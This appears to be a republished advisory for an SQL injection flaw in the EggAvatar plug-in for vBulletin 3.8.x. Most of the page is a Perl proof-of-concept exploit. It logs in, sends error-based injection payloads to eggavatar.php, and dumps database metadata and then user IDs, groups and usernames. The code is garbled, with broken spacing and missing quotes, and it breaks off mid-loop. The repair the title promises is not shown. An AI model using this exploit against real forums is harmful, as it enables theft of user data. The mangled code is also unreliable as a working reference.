EggAvatar for vBulletin 3.8.x SQL injection vulnerability and repair

VBulletin is a famous commercial Forum program. The EggAvatar plug-in vBulletin 3.8.x has the SQL injection vulnerability, which may cause sensitive information leakage.

[+] Info:
~~~~~~~~~
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability

[+] Poc:
~~~~~~~~~

View sourceprint? 01 #! /Usr/bin/env perl

02 use LWP: UserAgent;

03 sub banner {

04 print "###################################";

05 print "########### DSecurity ############";

06 print "###################################";

07 print "# Email: dsecurity. vn [at] gmail.com #";

08 print "###################################";

09}

10 if (@ ARGV <5 ){

11 print "Usage: $0 address username password number_user sleeptime ";

12 print "Example: $0 http: // localhost/vbb test 10 10 ";

13 exit ();

14}

15 $ ua = LWP: UserAgent-> new ();

16 $ ua-> agent ("DSecurity ");

17 $ ua-> cookie_jar ({});

18 sub login (@){

19 my $ username = shift;

20 my $ password = shift;

21 my $ req = HTTP: Request-> new (POST => $ ARGV [0]./login. php? Do = login );

22 $ req-> content_type (application/x-www-form-urlencoded );

23 $ req-> content ("vb_login_username = $ username & vb_login_passwor = $ password & s = & securitytoken = login & do = login & vb_login_md5password = & Signature = ");

24 my $ res = $ ua-> request ($ req );

25}

26 sub v_request {

27 # Declare

28 $ print =$ _ [0];

29 $ select =$ _ [1];

30 $ from =$ _ [2];

31 $ where =$ _ [3];

32 $ limit = $ _ [4];

33 $ sleep = $ ARGV [4];

34 if ($ from eq) {$ from = information_schema.tables ;}

35 if ($ where eq) {$ where = 1 ;}

36 if ($ limit eq) {$ limit = 0 ;}

37 if ($ sleep eq) {$ sleep = 10 ;}

38

39 # Create a request

40 my $ req = HTTP: Request-> new (POST => $ ARGV [0]./eggavatar. php );

41 $ req-> content_type (application/x-www-form-urlencoded );

42 $ req-> content (do = addegg & securitytoken = 1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961 & eggavatar = 1. "and (SELECT 1 FROM (select count (*), CONCAT (select $ select from $ from WHERE $ where limit $ limit, 1), FLOOR (RAND (1) * 3) foo FROM information_schema.tables group by foo) a) ---& uid = 1 & pid = 1 ");

43 # Pass request to the user agent and get a response back

44 my $ res = $ ua-> request ($ req );

45 # print $ res-> content;

46 if ($ res-> content = ~ /(MySQL Error )(.*?) (.*?) 0 (.*)/)

47 {$ test = $3 };

48 sleep ($ sleep );

49 return $ print. $ test ."";

50}

51 & banner;

52 print "##################################### ##################################";

53 print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #";

54 print "# Date: 06-03-2011 #";

55 print "# Author: DSecurity #";

56 print "# Software Link: html"> http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #";

57 print "# Version: 2.3.2 #";

58 print "# Tested on: vBulletin 3.8.0 #";

59 print "##################################### ######################################## #####";

60

61 # login

62 login ($ ARGV [1], $ ARGV [2]);

63 # Foot print

64 print v_request (MySQL version:, @ version );

65 print v_request (Data dir:, datadir );

66 print v_request (User:, user ());

67 print v_request (Database:, database ());

68 # Get user

69 for ($ I = 1; $ I <= $ ARGV [3]; $ I ++ ){

70 print "-----------------------------------------";

71 print $ id = v_request (ID:, userid, user, 1, $ i-1 );

72 if ($ id = ~ /(ID :) s (.*)/){

73 print v_request (Group:, usergroupid, user, userid =. $2 );

74 print v_request (Username:, username, user, userid =. $2 );

75